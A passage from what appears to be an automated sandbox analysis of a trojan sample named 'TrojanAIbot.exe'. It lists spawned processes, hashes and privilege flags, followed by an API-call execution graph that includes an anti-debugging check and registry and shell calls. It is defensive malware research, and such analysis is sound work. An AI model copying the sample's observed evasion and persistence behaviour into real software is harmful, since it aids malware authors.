MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:53
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:timeout 6
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x6e0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:54
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xa70000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:231'936 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:54
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:7FF4977D46F3519BDDBBC7F980695D96
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:55
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:57
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:AB5074630045AB26B71225715D67B7F6
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:11:02:58
Start date:05/11/2024
Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:0x140000000
File size:1'356'800 bytes
MD5 hash:7BBB6DB310D239DA8D65A687C939EAA5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:11:02:59
Start date:05/11/2024
Path:C:\Windows\System32\msdtc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\msdtc.exe
Imagebase:0x140000000
File size:1'278'464 bytes
MD5 hash:B997E00A6861615E066CA0DA6FBA54A6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:11:03:01
Start date:05/11/2024
Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:0x140000000
File size:1'235'968 bytes
MD5 hash:A1956F0F6BD74F7EF4C9CB4215174395
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:11:03:02
Start date:05/11/2024
Path:C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWow64\perfhost.exe
Imagebase:0x400000
File size:1'150'976 bytes
MD5 hash:5A2927C6AC02ED9AAA0EEAD979B6927B
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:11:03:04
Start date:05/11/2024
Path:C:\Windows\System32\Locator.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\locator.exe
Imagebase:0x140000000
File size:1'141'248 bytes
MD5 hash:9A657A7F089C2AF389D25AD39498587D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:11:03:05
Start date:05/11/2024
Path:C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\SensorDataService.exe
Imagebase:0x140000000
File size:1'846'784 bytes
MD5 hash:49C1710C0BFB918B23DDE91B5109B005
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:11:03:06
Start date:05/11/2024
Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x580000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:231'936 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:06
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'146'880 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:579893F6B0B6C9ED87C94C25F4EDC7E0
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:07
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:5C7A9FB953BDB52056F816EFDBDB2113
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:08
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'511'424 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:E3FDD9F1AB11BF5FA018CD72E8AF127F
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:09
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:34A80D2A50958A3B610C920E02938885
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:03:10
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\AgentService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\AgentService.exe
Imagebase: 0x140000000
File size: 1'801'216 bytes
MD5 hash: 9543A0B25A6C0199CB8A7CB3D1E158F8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 11:03:12
Start date: 05/11/2024
Path: C:\Windows\System32\vds.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\vds.exe
Imagebase: 0x140000000
File size: 1'303'552 bytes
MD5 hash: 2DBE73EC9F3D022F74934054582A8EBA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 11:03:13
Start date: 05/11/2024
Path: C:\Windows\System32\wbengine.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wbengine.exe"
Imagebase: 0x140000000
File size: 2'164'736 bytes
MD5 hash: C0B66BD1EE3D66E90E2046376956878E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 1.1%
Signature Coverage: 3.1%
Total number of Nodes: 1708
Total number of Limit Nodes: 51

[execution_graph: the interactive node/edge rendering (1708 nodes, 51 limit nodes) does not survive as readable text and is not reproduced here. API nodes visible in the extracted listing include an IsDebuggerPresent check with a branch to MessageBoxA; RegOpenKeyExW/RegQueryValueExW/RegCloseKey; GetModuleFileNameW, GetFullPathNameW and SetCurrentDirectoryW; GetForegroundWindow followed by ShellExecuteW; Shell_NotifyIconW, SetTimer/KillTimer and DefWindowProcW; LoadLibraryA/GetProcAddress and FreeLibrary; SetFilePointerEx/WriteFile; SystemParametersInfoW; CharUpperBuffW; VariantClear; RaiseException; RtlAllocateHeap/RtlFreeHeap, HeapAlloc and VirtualFree; and CRT start-up (GetStartupInfoW, HeapCreate, TlsAlloc/TlsSetValue, GetCommandLineW, GetEnvironmentStringsW, GetStdHandle/GetFileType).]
GetModuleFileNameW 85560 40ff90 85434->85560 85436 401fbd 85572 4107b0 85436->85572 85439 401b70 75 API calls 85440 401fe4 85439->85440 85575 4019e0 85440->85575 85442 401ff2 85443 4092c0 VariantClear 85442->85443 85444 402002 85443->85444 85445 401b70 75 API calls 85444->85445 85446 40201c 85445->85446 85447 4019e0 76 API calls 85446->85447 85448 40202c 85447->85448 85449 401b70 75 API calls 85448->85449 85450 40203c 85449->85450 85583 40c3e0 85450->85583 85452 40204d 85601 40c060 85452->85601 85456 40206e 85613 4115d0 85456->85613 85459 42c174 85462 401a70 75 API calls 85459->85462 85460 402088 85461 4115d0 __wcsicoll 79 API calls 85460->85461 85464 402093 85461->85464 85463 42c189 85462->85463 85466 401a70 75 API calls 85463->85466 85464->85463 85465 40209e 85464->85465 85467 4115d0 __wcsicoll 79 API calls 85465->85467 85468 42c1a7 85466->85468 85469 4020a9 85467->85469 85470 42c1b0 GetModuleFileNameW 85468->85470 85469->85470 85471 4020b4 85469->85471 85473 401a70 75 API calls 85470->85473 85472 4115d0 __wcsicoll 79 API calls 85471->85472 85474 4020bf 85472->85474 85475 42c1e2 85473->85475 85476 402107 85474->85476 85479 42c20a _wcscpy 85474->85479 85482 401a70 75 API calls 85474->85482 85625 40df50 75 API calls 85475->85625 85478 402119 85476->85478 85476->85479 85481 42c243 85478->85481 85621 40e7e0 76 API calls 85478->85621 85487 401a70 75 API calls 85479->85487 85480 42c1f1 85483 401a70 75 API calls 85480->85483 85485 4020e5 _wcscpy 85482->85485 85486 42c201 85483->85486 85491 401a70 75 API calls 85485->85491 85486->85479 85495 402148 85487->85495 85488 402132 85622 40d030 76 API calls 85488->85622 85490 40213e 85492 4092c0 VariantClear 85490->85492 85491->85476 85492->85495 85493 402184 85497 4092c0 VariantClear 85493->85497 85495->85493 85498 401a70 75 API calls 85495->85498 85623 40d030 76 API calls 85495->85623 85624 40e640 76 API calls 85495->85624 85499 402196 ctype 85497->85499 85498->85495 85499->85390 85501 42ccf4 _memset 85500->85501 85502 40f3c9 
85500->85502 85505 42cd05 GetOpenFileNameW 85501->85505 86302 40ffb0 76 API calls ctype 85502->86302 85504 40f3d2 86303 410130 SHGetMalloc 85504->86303 85505->85502 85507 40d732 85505->85507 85507->85398 85507->85400 85508 40f3d9 86308 410020 88 API calls __wcsicoll 85508->86308 85510 40f3e7 86309 40f400 85510->86309 85513 42b9d3 85512->85513 85514 41025a LoadImageW RegisterClassExW 85512->85514 86356 443e8f EnumResourceNamesW LoadImageW 85513->86356 86355 4102f0 7 API calls 85514->86355 85517 40d790 85519 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85517->85519 85518 42b9da 85519->85412 85522 40e207 _memset 85520->85522 85521 40e262 85527 40e2a4 85521->85527 86357 43737d 84 API calls __wcsicoll 85521->86357 85522->85521 85523 42aa14 DestroyIcon 85522->85523 85523->85521 85525 40e2c0 Shell_NotifyIconW 85528 401be0 77 API calls 85525->85528 85526 42aa50 Shell_NotifyIconW 85527->85525 85527->85526 85529 40e2da 85528->85529 85529->85420 85530->85400 85531->85413 85532->85400 85533->85406 85535 401b76 _wcslen 85534->85535 85536 41171a 75 API calls 85535->85536 85539 401bc5 85535->85539 85537 401bad _memcpy_s 85536->85537 85538 41171a 75 API calls 85537->85538 85538->85539 85540 40d3b0 75 API calls 2 library calls 85539->85540 85540->85419 85541->85423 85543 40c060 75 API calls 85542->85543 85544 401f90 85543->85544 85545 402940 85544->85545 85546 40294a __write_nolock 85545->85546 85547 4021e0 75 API calls 85546->85547 85549 402972 85547->85549 85555 4029a4 85549->85555 85626 401cf0 85549->85626 85550 402ae0 75 API calls 85550->85555 85551 402a8c 85552 401b70 75 API calls 85551->85552 85559 402abe 85551->85559 85554 402ab3 85552->85554 85553 401b70 75 API calls 85553->85555 85630 40d970 75 API calls 2 library calls 85554->85630 85555->85550 85555->85551 85555->85553 85557 401cf0 75 API calls 85555->85557 85629 40d970 75 API calls 2 library calls 85555->85629 85557->85555 85559->85434 85631 40f5e0 85560->85631 85563 40ffa6 85563->85436 85565 42b6d8 
85568 42b6e6 85565->85568 85687 434fe1 85565->85687 85567 413a88 __fclose_nolock 67 API calls 85569 42b6f5 85567->85569 85568->85567 85570 434fe1 106 API calls 85569->85570 85571 42b702 85570->85571 85571->85436 85573 41171a 75 API calls 85572->85573 85574 401fd6 85573->85574 85574->85439 85576 401a03 85575->85576 85581 4019e5 85575->85581 85577 401a1a 85576->85577 85576->85581 86291 404260 76 API calls 85577->86291 85578 4019ff 85578->85442 85580 401a26 85580->85442 85581->85578 86290 404260 76 API calls 85581->86290 85584 40c3e4 85583->85584 85585 40c42c 85583->85585 85586 40c3f0 85584->85586 85587 42a475 85584->85587 85588 42a422 85585->85588 85589 40c435 85585->85589 86292 4042f0 75 API calls __cinit 85586->86292 86297 453155 75 API calls 85587->86297 85591 42a427 85588->85591 85592 42a445 85588->85592 85593 40c441 85589->85593 85594 42a455 85589->85594 85600 40c3fb 85591->85600 86294 453155 75 API calls 85591->86294 86295 453155 75 API calls 85592->86295 86293 4042f0 75 API calls __cinit 85593->86293 86296 453155 75 API calls 85594->86296 85600->85452 85602 41171a 75 API calls 85601->85602 85603 40c088 85602->85603 85604 41171a 75 API calls 85603->85604 85605 402061 85604->85605 85606 401a70 85605->85606 85607 401a90 85606->85607 85608 401a77 85606->85608 85609 4021e0 75 API calls 85607->85609 85610 401a8d 85608->85610 86298 404080 75 API calls _memcpy_s 85608->86298 85611 401a9c 85609->85611 85610->85456 85611->85456 85614 4115e1 85613->85614 85615 411650 85613->85615 85619 40207d 85614->85619 86299 417f23 67 API calls __getptd_noexit 85614->86299 86301 4114bf 79 API calls 3 library calls 85615->86301 85618 4115ed 86300 417ebb 6 API calls 2 library calls 85618->86300 85619->85459 85619->85460 85621->85488 85622->85490 85623->85495 85624->85495 85625->85480 85627 402ae0 75 API calls 85626->85627 85628 401cf7 85627->85628 85628->85549 85629->85555 85630->85559 85691 40f580 85631->85691 85633 40f5f8 _strcat ctype 85699 40f6d0 85633->85699 85638 42b2ee 85728 
4151b0 85638->85728 85640 40f679 85640->85638 85641 40f681 85640->85641 85715 414e94 85641->85715 85645 40f68b 85645->85563 85650 452574 85645->85650 85647 42b31d 85734 415484 85647->85734 85649 42b33d 85651 41557c _fseek 105 API calls 85650->85651 85652 4525df 85651->85652 86235 4523ce 85652->86235 85655 4525fc 85655->85565 85656 4151b0 __fread_nolock 81 API calls 85657 45261d 85656->85657 85658 4151b0 __fread_nolock 81 API calls 85657->85658 85659 45262e 85658->85659 85660 4151b0 __fread_nolock 81 API calls 85659->85660 85661 452649 85660->85661 85662 4151b0 __fread_nolock 81 API calls 85661->85662 85663 452666 85662->85663 85664 41557c _fseek 105 API calls 85663->85664 85665 452682 85664->85665 85666 4138ba _malloc 67 API calls 85665->85666 85667 45268e 85666->85667 85668 4138ba _malloc 67 API calls 85667->85668 85669 45269b 85668->85669 85670 4151b0 __fread_nolock 81 API calls 85669->85670 85671 4526ac 85670->85671 85672 44afdc GetSystemTimeAsFileTime 85671->85672 85673 4526bf 85672->85673 85674 4526d5 85673->85674 85675 4526fd 85673->85675 85676 413a88 __fclose_nolock 67 API calls 85674->85676 85677 452704 85675->85677 85678 45275b 85675->85678 85679 4526df 85676->85679 86241 44b195 85677->86241 85681 413a88 __fclose_nolock 67 API calls 85678->85681 85682 413a88 __fclose_nolock 67 API calls 85679->85682 85684 452759 85681->85684 85685 4526e8 85682->85685 85683 452753 85686 413a88 __fclose_nolock 67 API calls 85683->85686 85684->85565 85685->85565 85686->85684 85688 434ff1 85687->85688 85689 434feb 85687->85689 85688->85568 85690 414e94 __fcloseall 106 API calls 85689->85690 85690->85688 85692 429440 85691->85692 85693 40f589 _wcslen 85691->85693 85694 40f58f WideCharToMultiByte 85693->85694 85695 40f5d8 85694->85695 85696 40f5ad 85694->85696 85695->85633 85697 41171a 75 API calls 85696->85697 85698 40f5bb WideCharToMultiByte 85697->85698 85698->85633 85700 40f6dd _strlen 85699->85700 85747 40f790 85700->85747 85703 414e06 85766 414d40 85703->85766 85705 40f666 
85705->85638 85706 40f450 85705->85706 85710 40f45a _strcat _memcpy_s __write_nolock 85706->85710 85707 4151b0 __fread_nolock 81 API calls 85707->85710 85709 42936d 85711 41557c _fseek 105 API calls 85709->85711 85710->85707 85710->85709 85714 40f531 85710->85714 85849 41557c 85710->85849 85712 429394 85711->85712 85713 4151b0 __fread_nolock 81 API calls 85712->85713 85713->85714 85714->85640 85716 414ea0 __sopen_helper 85715->85716 85717 414ed1 85716->85717 85718 414eb4 85716->85718 85721 415965 __lock_file 68 API calls 85717->85721 85726 414ec9 __sopen_helper 85717->85726 85988 417f23 67 API calls __getptd_noexit 85718->85988 85720 414eb9 85989 417ebb 6 API calls 2 library calls 85720->85989 85723 414ee9 85721->85723 85972 414e1d 85723->85972 85726->85645 86057 41511a 85728->86057 85730 4151c8 85731 44afdc 85730->85731 86228 4431e0 85731->86228 85733 44affd 85733->85647 85735 415490 __sopen_helper 85734->85735 85736 4154bb 85735->85736 85737 41549e 85735->85737 85739 415965 __lock_file 68 API calls 85736->85739 86232 417f23 67 API calls __getptd_noexit 85737->86232 85741 4154c3 85739->85741 85740 4154a3 86233 417ebb 6 API calls 2 library calls 85740->86233 85743 4152e7 __ftell_nolock 71 API calls 85741->85743 85744 4154cf 85743->85744 86234 4154e8 LeaveCriticalSection LeaveCriticalSection _fseek 85744->86234 85746 4154b3 __sopen_helper 85746->85649 85748 40f7ae _memset 85747->85748 85750 40f628 85748->85750 85751 415258 85748->85751 85750->85703 85752 415285 85751->85752 85753 415268 85751->85753 85752->85753 85755 41528c 85752->85755 85762 417f23 67 API calls __getptd_noexit 85753->85762 85764 41c551 103 API calls 14 library calls 85755->85764 85756 41526d 85763 417ebb 6 API calls 2 library calls 85756->85763 85759 41527d 85759->85748 85760 4152b2 85760->85759 85765 4191c9 101 API calls 6 library calls 85760->85765 85762->85756 85764->85760 85765->85759 85767 414d4c __sopen_helper 85766->85767 85768 414d5f 85767->85768 85771 414d95 85767->85771 85818 417f23 67 
API calls __getptd_noexit 85768->85818 85770 414d64 85819 417ebb 6 API calls 2 library calls 85770->85819 85785 41e28c 85771->85785 85774 414d74 __sopen_helper @_EH4_CallFilterFunc@8 85774->85705 85775 414d9a 85776 414da1 85775->85776 85777 414dae 85775->85777 85820 417f23 67 API calls __getptd_noexit 85776->85820 85779 414dd6 85777->85779 85780 414db6 85777->85780 85803 41dfd8 85779->85803 85821 417f23 67 API calls __getptd_noexit 85780->85821 85786 41e298 __sopen_helper 85785->85786 85787 418407 __lock 67 API calls 85786->85787 85800 41e2a6 85787->85800 85788 41e322 85789 416fb6 __malloc_crt 67 API calls 85788->85789 85791 41e32c 85789->85791 85799 41e31b 85791->85799 85828 4189e6 InitializeCriticalSectionAndSpinCount __sopen_helper 85791->85828 85792 41e3b0 __sopen_helper 85792->85775 85794 418344 __mtinitlocknum 67 API calls 85794->85800 85796 41e351 85797 41e35c 85796->85797 85798 41e36f EnterCriticalSection 85796->85798 85801 413a88 __fclose_nolock 67 API calls 85797->85801 85798->85799 85823 41e3bb 85799->85823 85800->85788 85800->85794 85800->85799 85826 4159a6 68 API calls __lock 85800->85826 85827 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85800->85827 85801->85799 85804 41dffb __wopenfile 85803->85804 85805 41e015 85804->85805 85817 41e1e9 85804->85817 85835 4136bc 79 API calls __wcsnicmp_l 85804->85835 85833 417f23 67 API calls __getptd_noexit 85805->85833 85807 41e01a 85834 417ebb 6 API calls 2 library calls 85807->85834 85808 41e247 85830 425db0 85808->85830 85813 41e1e2 85813->85817 85836 4136bc 79 API calls __wcsnicmp_l 85813->85836 85815 41e201 85815->85817 85837 4136bc 79 API calls __wcsnicmp_l 85815->85837 85817->85805 85817->85808 85818->85770 85820->85774 85821->85774 85822 414dfc LeaveCriticalSection LeaveCriticalSection _fseek 85822->85774 85829 41832d LeaveCriticalSection 85823->85829 85825 41e3c2 85825->85792 85826->85800 85827->85800 85828->85796 85829->85825 85838 425ce4 85830->85838 85832 414de1 85832->85822 85833->85807 
85835->85813 85836->85815 85837->85817 85839 425cf0 __sopen_helper 85838->85839 85840 425d03 85839->85840 85843 425d41 85839->85843 85841 417f23 __wcsnicmp_l 67 API calls 85840->85841 85842 425d08 85841->85842 85844 417ebb __wcsnicmp_l 6 API calls 85842->85844 85845 4255c4 __tsopen_nolock 132 API calls 85843->85845 85848 425d17 __sopen_helper 85844->85848 85846 425d5b 85845->85846 85847 425d82 __sopen_helper LeaveCriticalSection 85846->85847 85847->85848 85848->85832 85852 415588 __sopen_helper 85849->85852 85850 415596 85880 417f23 67 API calls __getptd_noexit 85850->85880 85851 4155c4 85862 415965 85851->85862 85852->85850 85852->85851 85855 41559b 85881 417ebb 6 API calls 2 library calls 85855->85881 85861 4155ab __sopen_helper 85861->85710 85863 415977 85862->85863 85864 415999 EnterCriticalSection 85862->85864 85863->85864 85865 41597f 85863->85865 85866 4155cc 85864->85866 85867 418407 __lock 67 API calls 85865->85867 85868 4154f2 85866->85868 85867->85866 85869 415512 85868->85869 85870 415502 85868->85870 85872 415524 85869->85872 85883 4152e7 85869->85883 85937 417f23 67 API calls __getptd_noexit 85870->85937 85900 41486c 85872->85900 85874 415507 85882 4155f7 LeaveCriticalSection LeaveCriticalSection _fseek 85874->85882 85880->85855 85882->85861 85884 41531a 85883->85884 85885 4152fa 85883->85885 85887 41453a __fileno 67 API calls 85884->85887 85938 417f23 67 API calls __getptd_noexit 85885->85938 85889 415320 85887->85889 85888 4152ff 85939 417ebb 6 API calls 2 library calls 85888->85939 85891 41efd4 __locking 71 API calls 85889->85891 85892 415335 85891->85892 85893 4153a9 85892->85893 85895 415364 85892->85895 85899 41530f 85892->85899 85940 417f23 67 API calls __getptd_noexit 85893->85940 85896 41efd4 __locking 71 API calls 85895->85896 85895->85899 85897 415404 85896->85897 85898 41efd4 __locking 71 API calls 85897->85898 85897->85899 85898->85899 85899->85872 85901 4148a7 85900->85901 85902 414885 85900->85902 85906 41453a 85901->85906 85902->85901 
